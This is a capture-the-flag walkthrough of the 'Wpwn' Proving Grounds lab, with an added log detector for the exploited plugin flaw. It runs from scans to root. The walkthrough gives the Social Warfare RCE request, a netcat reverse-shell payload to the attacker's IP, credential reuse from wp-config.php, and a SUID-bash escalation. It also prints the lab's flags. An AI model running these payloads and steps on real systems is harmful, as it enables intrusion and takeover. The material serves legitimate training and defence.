OSCP - Proving Grounds - Wpwn

Key points

  • Path brute-forcing
  • WordPress plugin RCE
  • Plaintext password (reused for a local account)
  • sudo privilege escalation

Walkthrough

Information gathering

nmap scan

Straightforward: only 22 (OpenSSH 7.9p1) and 80 (Apache 2.4.38) are open.

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 59:b7:db:e0:ba:63:76:af:d0:20:03:11:e1:3c:0e:34 (RSA)
|   256 2e:20:56:75:84:ca:35:ce:e3:6a:21:32:1f:e7:f5:9a (ECDSA)
|_  256 0d:02:83:8b:1a:1c:ec:0f:ae:74:cc:7b:da:12:89:9e (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

nikto scan

nikto found robots.txt and the /wordpress/ path; robots.txt held nothing of value, but the WordPress install (with a browsable wp-content/uploads/ directory) is the obvious attack surface.

- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.151.123
+ Target Hostname:    192.168.151.123
+ Target Port:        80
+ Start Time:         2025-04-27 19:23:06 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.38 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ OPTIONS: Allowed HTTP Methods: GET, POST, OPTIONS, HEAD .
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /wordpress/wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version.
+ /wordpress/wp-links-opml.php: This WordPress script reveals the installed version.
+ /wordpress/wp-admin/: Uncommon header 'x-redirect-by' found, with contents: WordPress.
+ /wordpress/: Drupal Link header found with value: <http://192.168.151.123/wordpress/index.php/wp-json/>; rel="https://api.w.org/". See: https://www.drupal.org/
+ /wordpress/: A Wordpress installation was found.
+ /wordpress/wp-login.php?action=register: Cookie wordpress_test_cookie created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /wordpress/wp-content/uploads/: Directory indexing found.
+ /wordpress/wp-content/uploads/: Wordpress uploads directory is browsable. This may reveal sensitive information.
+ /wordpress/wp-login.php: Wordpress login found.
+ 8102 requests: 0 error(s) and 14 item(s) reported on remote host
+ End Time:           2025-04-27 20:14:56 (GMT-4) (3110 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

wpscan

Running wpscan against /wordpress/ flags a vulnerable plugin, social-warfare. Note that the excerpt below does not pin the installed version, so the first of the eight listed issues (CVE-2019-9978, unauthenticated settings update / RCE, fixed in 3.5.3) still has to be confirmed against the target.

[i] Plugin(s) Identified:

[+] social-warfare
 | Location: http://192.168.151.123/wordpress/wp-content/plugins/social-warfare/
 | Last Updated: 2025-03-18T09:37:00.000Z
 | [!] The version is out of date, the latest version is 4.5.6
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Comment (Passive Detection)
 |
 | [!] 8 vulnerabilities identified:
 |
 | [!] Title: Social Warfare <= 3.5.2 - Unauthenticated Arbitrary Settings Update
 |     Fixed in: 3.5.3
 |     References:
 |      - https://wpscan.com/vulnerability/32085d2d-1235-42b4-baeb-bc43172a4972
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9978
 |      - https://wordpress.org/support/topic/malware-into-new-update/
 |      - https://www.wordfence.com/blog/2019/03/unpatched-zero-day-vulnerability-in-social-warfare-plugin-exploited-in-the-wild/
 |      - https://threatpost.com/wordpress-plugin-removed-after-zero-day-discovered/143051/
 |      - https://twitter.com/warfareplugins/status/1108826025188909057
 |      - https://www.wordfence.com/blog/2019/03/recent-social-warfare-vulnerability-allowed-remote-code-execution/
 |

Initial foothold

Getting a www-data shell

The exploit follows the description in the post "Social Warfare <= 3.5.2 -- Unauthenticated Remote Code Execution (RCE) | Plugin Vulnerabilities".

Create payload.txt in a local directory with the following content. The vulnerable debug hook fetches the file named by swp_url and eval()s whatever sits between the <pre> and </pre> tags as PHP, which is why the command is wrapped that way:

<pre>system('rm /tmp/f ; mkfifo /tmp/f;cat /tmp/f | /bin/bash -i 2>&1 | nc 192.168.45.217 443 >/tmp/f')</pre>

Start a local HTTP server on port 8000 (python3 -m http.server 8000, for example) and a listener with nc -nlvp 443, then request http://192.168.151.123/wordpress/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://192.168.45.217:8000/payload.txt

This yields a reverse shell as www-data; the first flag (local.txt) is also readable under /var/www.

└─$ nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.45.217] from (UNKNOWN) [192.168.151.123] 37504
bash: cannot set terminal process group (517): Inappropriate ioctl for device
bash: no job control in this shell
www-data@wpwn:/var/www/html/wordpress/wp-admin$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
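For the defending side, this trigger is easy to spot in the web server log: an unauthenticated GET to wp-admin/admin-post.php carrying swp_debug=load_options and an swp_url that points at a host the site has no business fetching from. The detector below is an added example written for this page, not part of the original writeup. It parses Apache combined-format lines (the sample lines are constructed to mirror the request above, with made-up client addresses) and flags every load_options hit together with the host the payload was staged on, decoding percent-encoded swp_url values so an attacker cannot hide the staging host behind encoding.

```python
#!/usr/bin/env python3
"""Flag CVE-2019-9978 (Social Warfare load_options) triggers in Apache access logs.

Added example for this writeup; the log lines below are constructed, not taken
from the lab host.
"""
import re
import urllib.parse
from dataclasses import dataclass
from typing import List, Optional

# Apache "combined" log format: ip ident user [ts] "METHOD path PROTO" status size "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)(?: "(?P<ref>[^"]*)" "(?P<ua>[^"]*)")?'
)

# Constructed sample: one raw trigger, one percent-encoded trigger, two benign requests.
SAMPLE_LOG = """\
192.168.45.217 - - [27/Apr/2025:19:45:02 -0400] "GET /wordpress/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://192.168.45.217:8000/payload.txt HTTP/1.1" 200 1254 "-" "Mozilla/5.0"
10.10.10.5 - - [27/Apr/2025:19:46:10 -0400] "GET /wordpress/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http%3A%2F%2Fevil.example%2Fp.txt HTTP/1.1" 500 312 "-" "curl/7.88.1"
10.10.10.7 - - [27/Apr/2025:19:47:30 -0400] "GET /wordpress/ HTTP/1.1" 200 8120 "-" "Mozilla/5.0"
10.10.10.8 - - [27/Apr/2025:19:48:01 -0400] "POST /wordpress/wp-admin/admin-post.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""


@dataclass
class Finding:
    client: str
    ts: str
    status: str
    swp_url: str
    staging_host: Optional[str]  # where the eval()'d file was fetched from


def detect_swp_load_options(log_text: str) -> List[Finding]:
    """Return one Finding per request that reached the vulnerable debug hook.

    The load_options hook has no legitimate use from the public internet, so every
    hit is worth triage regardless of the HTTP status; the staging host tells the
    responder where to look next (and what to block).
    """
    findings: List[Finding] = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        parts = urllib.parse.urlsplit(m["path"])
        if not parts.path.endswith("/wp-admin/admin-post.php"):
            continue
        qs = urllib.parse.parse_qs(parts.query)  # also percent-decodes values
        if qs.get("swp_debug", [""])[0] != "load_options":
            continue
        swp_url = qs.get("swp_url", [""])[0]
        host = urllib.parse.urlsplit(swp_url).hostname if swp_url else None
        findings.append(Finding(m["ip"], m["ts"], m["status"], swp_url, host))
    return findings


if __name__ == "__main__":
    for f in detect_swp_load_options(SAMPLE_LOG):
        print(f"[!] {f.ts} client={f.client} status={f.status} "
              f"staging_host={f.staging_host} swp_url={f.swp_url}")
```

Run against a real log with python3 -c 'import sys, swp_detect; ...' or simply replace SAMPLE_LOG with open("/var/log/apache2/access.log").read(). Pair the hit with an outbound connection from the web server to staging_host (or to the reverse-shell listener) in firewall or NetFlow data to confirm exploitation rather than a scan.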

Privilege escalation

Getting the takis user

Next, upload linpeas to help enumerate the host.

Among its findings is the WordPress database configuration file, which necessarily holds the database password in plaintext:

www-data@wpwn:/tmp$ cat /var/www/html/wordpress/wp-config.php
cat /var/www/html/wordpress/wp-config.php
......
......
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress_db' );

/** MySQL database username */
define( 'DB_USER', 'wp_user' );

/** MySQL database password */
define( 'DB_PASSWORD', 'R3&]vzhHmMn9,:-5' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );

/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

Trying that password elsewhere shows it is reused: it is also the login password of the local user takis.

www-data@wpwn:/tmp$ su takis
su takis
Password: R3&]vzhHmMn9,:-5
id
uid=1000(takis) gid=1000(takis) groups=1000(takis),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

Moreover, this user can run any command through sudo without a password:

sudo -l
Matching Defaults entries for takis on wpwn:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User takis may run the following commands on wpwn:
    (ALL) NOPASSWD: ALL

Privilege escalation is therefore trivial. With (ALL) NOPASSWD: ALL, sudo -i would give a root shell directly; the author instead sets the SUID bit on /bin/bash and runs it with -p. Note that this leaves a SUID root bash on the box, so it should be reverted (sudo chmod -s /bin/bash) once the proof is collected.

sudo chmod +s /bin/bash
ls -l /bin/bash
-rwsr-sr-x 1 root root 1168776 Apr 18  2019 /bin/bash
/bin/bash -p
id
uid=1000(takis) gid=1000(takis) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),1000(takis)
cat /root/proof.txt
1c7593989911e8bc71c50609491b6166
cat /var/www/local.txt
4c07c5f1165c40d6be363891b297dca4